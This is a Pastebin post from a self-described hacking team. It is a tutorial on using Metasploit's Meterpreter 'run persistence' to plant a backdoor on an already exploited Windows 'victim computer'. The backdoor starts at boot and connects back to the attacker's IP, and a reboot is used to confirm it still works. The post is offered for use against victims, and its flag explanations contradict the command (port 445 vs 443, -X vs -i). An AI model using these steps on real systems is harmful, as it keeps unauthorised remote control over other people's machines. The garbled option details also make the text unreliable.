CyberdarkKh

How to Create a Persistent Backdoor

May 7th, 2015
760
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.88 KB | None | 0 0
  1. Team Cyberdark [ Tutorial(#Operation Freedom Internet Hacking) ]
  2.  
  3. I am Member Team Cyberdark
  4.  
  5. Hello Everyone I want to show Persistence is very important if you exploit windows someone successfully just to know
  6.  
  7. If you i don't about first my video Exploit windows xp by IP victim computer no need use malware,Bot,Trojan,Backdoor
  8. go follow this link : ( https://youtu.be/FyUX_1vMMgg ) Note : Step-by-step but need to know all together my video can exploit only windows XP
  9.  
  10. =========================================================================================================================================================================================================================
  11.  
  12. Metasploit Persistent Backdoor
  13.  
  14. Why need use Persistent Backdoor ?
  15.  
  16. If you have succeed to exploit a system you may consider to place a back-door in order to connect again easily with your target.
  17. For example if the user decides to install a patch or to remove the vulnerable service in his system then you will need to figure out an alternative way for getting again access to the remote system.
  18. That’s why back-doors are important because they can maintain access to a system again
  19. (no need exploit by ip and backdoor again)
  20. ==========================================================================================================================================================================================================================
  21.  
  22. Step 1 : I need you exploit Windows successfully by my step on link or use Metasploit use Backdoor or Trojan exploit victim computer
  23.  
  24. Step 2 : 1/ meterpreter > (Type) run persistence -h
  25. 2/ meterpreter >run persistence –A –L c:\\ -X 30 –p 445 –r 192.168.1.1 (our IP)
  26. c:\\ on the target system (-L c:\\), starts the listener when the system boots (-x),
  27. checks every 30 seconds for a connection (-i 30) , connects on port 443 (-p 443), and connects to the local system (our IP) on IP address 192.168.1.1
  28. 3/We can see that we have opened a Meterpreter session on the victim system.
  29. We return to our Metasploit prompt, by typing:
  30. 4/ meterpreter > background
  31. This will return us to the msf prompt, where can now type:
  32. 5/ msf exploit(ms08_067_netapi) > sessions –i this type for test we upload succeed or not ?
  33. Step 3 : We need to test
  34. 1/ meterpreter > (Type) reboot
  35. After the reboot we will execute the command sessions -i in order to check if the backdoor have connected with our system.
  36.  
  37. Step 4 : We can see that the backdoor is working perfectly.So we can use the sessions -i 1 (ID)
  38. command in order to interact again with our target and to execute commands.For example we can use the getuid and the ipconfig commands in order to discover the IP address and the name of the user that is running the operating system.
Advertisement
Add Comment
Please, Sign In to add comment